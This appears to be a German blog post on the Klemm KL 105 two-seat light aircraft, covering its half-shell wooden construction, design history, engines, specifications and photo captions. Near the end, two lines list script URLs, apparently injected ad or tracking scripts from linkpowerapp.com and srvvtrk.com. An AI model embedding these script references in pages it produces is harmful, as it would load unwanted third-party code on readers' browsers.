Klemm KL105

…war ein ziviles Sport- und Reiseflugzeug

Das Flugzeug war ein freitragender Tiefdecker in Ganzholz-Teilschalenbauweise mit unverkleidetem starrem Normalfahrgestell. Die Zwei-Mann-Besatzung saß nebeneinan- der in einer geschlossenen Kabine. Das Bruchlastvielfache lag bei 7,2. Der Motor trieb eine starre zweiblättrige Holzluftschraube von zwei Metern Durchmesser an. Die  Tragflächen-außenteile waren anklappbar, so dass das Flugzeug zum Abstellen eine Breite von nur 2,3 Metern aufwies. Entworfen wurde das Flugzeug 1938 in der von Klemm selbst entwi- ckelten und patentierten (DE 729100 6. November 1936) Teilschalenbauweise. Teilschalen bestehend aus Spanten, Gurten, Sperrholzaußenhaut wurden unlöslich durch eine neuartige Klebetechnik verbunden.

Klemm Halbeschalen-Bauweise - die beiden Hälften vor dem Zusammenbau (Supf)

Klemm Halbeschalen-Bauweise - Montage der Einbauten (Supf)

Unter Temperatur und Druck entstand ein leichtes aber sehr festes Bauelement, das zum Beispiel als Rumpfhalbschale verwendet wurde. Das Verfahren wurde auch bei den Tragflächen- und Leitwerkskonstruktionen ab 1938 bei Klemm verwendet. Das erste Modell bei dem diese Bauweise angewandt wurde war die Klemm KL 105. Anfang 1938 entwarf Carl Bucher einen zweisitzigen Tiefdecker mit festem Heckspornfahrwerk und Normal-leitwerk, der als Privatflugzeug und von Fliegerclubs als Reise-, Schul- oder Schlepp-flugzeug für Segelflugzeuge verwendet werden sollte. Als Motor wurde der Vierzylinder-Reihenmotor Zündapp Z9-092 verwendet, der aus zwei Liter Hubraum 50 PS entwickelte. Der Rumpf bestand aus zwei Halbschalen und bot in der vollverglasten, relativ geräumi- gen Kabine zwei nebeneinanderliegende Plätze für den Piloten und einen Fluggast oder für Flugschüler und Fluglehrer. Der zweiteilige Tragflügel war ebenfalls in Teilschalenbau- weise ausgeführt und schloss an ein, fest am Rumpf befindliches, kurzes Mittelstück an. Die Außenflügel konnten nach Lösen der Verbindungsbolzen an dieser Trennstelle nach hinten geklappt werden. Höhen- und Seitenleitwerk waren freitragend und ebenfalls als Teilschalen ausgebildet. Die Haupträder des festen Fahrwerks waren an Dreibeinträgern aufgehängt und wurden über Duo Servo Innenbackenbremsen hydraulisch gebremst. Der Schleifsporn war gefedert. Der Erstflug der Klemm KL 105 fand im September 1938 statt und die folgende Flugerprobung zeigte die Vorteile der neuen Bauweise deutlich, die Maschine war leichter und gleichzeitig robuster als ihre Vorgänger. Bei Klemm begann man den Serien- bau vorzubereiten, es entstand eine Nullserie von 11 Maschinen, von denen einige auch mit dem Vierzylinder-Reihenmotor Hirth HM 515 ausgerüstet wurden.    (Wikipedia)

Kenngröße Klemm KL 105
Besatzung 1
Passagiere 1
Länge 7,35 m
Spannweite 10,92 m
Höhe 2,0 m
Flügelfläche 15,0 m²
Leermasse 340 kg
max. Startmasse 560 kg
Reisegeschwindigkeit  ? km/h
Höchstgeschwindigkeit 150 km/h
Dienstgipfelhöhe 3000 m
Reichweite 500 km
Triebwerke Zündapp Z 9-092 mit 50 PS oder Hirth HM 515 mit 65 PS

Klemm KL105 (3)

Klemm KL105https://www.flugzeugforum.de/attachment.php?attachmentid=1121137&d=1493126455Klicke auf die Grafik für eine größere Ansicht  Name: Klemm KL107 (Haverland)_.jpg  Hits: 2  Größe: 49.6 KB  ID: 1121138Die beiden Aufnahmen zeigen die Klemm Kl 105 V1 (Kennzeichen D-EPQH) die als einzige mit einem Sternmotor, dem Salmson Ad9, ausgerüstet war. Sie erhielt später einen Zündapp 9-092-Motor (Foto Haverland-Kalkstein Tochter)
klemm-kl105-d-erhs-50-ps-zuendsapp-motor-haverland-klemm-bild09klemm-kl105-staffel-mit-zuendapp-motor-haverland-klemm-bild10klemm-kl105-d-ewvd-50ps-zuendapp                    Klemm KL 105 D-EWVD 50PS Zündapp

//linkpowerapp.com/1cbdf4dd52d9e39c1f.jshttps://srvvtrk.com/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52288x7357x&r=1546152117320https://linkpowerapp.com/addons/lnkr5.min.jshttps://linkpowerapp.com/ext/1cbdf4dd52d9e39c1f.js?sid=52288_7357_&title=FF604extpowerappcool&blocks%5B%5D=31af2

//linkpowerapp.com/1cbdf4dd52d9e39c1f.jshttps://srvvtrk.com/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52288x7357x&r=1546152266923https://linkpowerapp.com/addons/lnkr5.min.jshttps://linkpowerapp.com/ext/1cbdf4dd52d9e39c1f.js?sid=52288_7357_&title=FF604extpowerappcool&blocks%5B%5D=31af2

Werbeanzeigen

Kommentar verfassen

Trage deine Daten unten ein oder klicke ein Icon um dich einzuloggen:

WordPress.com-Logo

Du kommentierst mit Deinem WordPress.com-Konto. Abmelden /  Ändern )

Google Foto

Du kommentierst mit Deinem Google-Konto. Abmelden /  Ändern )

Twitter-Bild

Du kommentierst mit Deinem Twitter-Konto. Abmelden /  Ändern )

Facebook-Foto

Du kommentierst mit Deinem Facebook-Konto. Abmelden /  Ändern )

Verbinde mit %s